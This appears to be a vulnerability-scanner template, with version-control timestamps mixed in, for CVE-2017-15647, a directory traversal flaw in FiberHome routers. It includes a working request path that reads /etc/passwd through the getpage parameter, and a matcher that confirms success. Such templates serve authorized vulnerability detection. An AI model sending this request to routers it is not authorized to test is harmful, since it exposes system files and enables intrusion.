2021-07-27 11:36:29 +00:00
id : CVE-2017-15647
info :
name : FiberHome - Directory Traversal
author : daffainfo
2021-09-10 11:26:40 +00:00
severity : high
2021-07-27 11:36:29 +00:00
description : On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
2021-08-18 11:37:49 +00:00
reference :
2021-07-27 11:36:29 +00:00
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
tags : cve,cve2017,lfi,router
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2017-15647
cwe-id : CWE-22
2021-07-27 11:36:29 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
- type : status
status :
- 200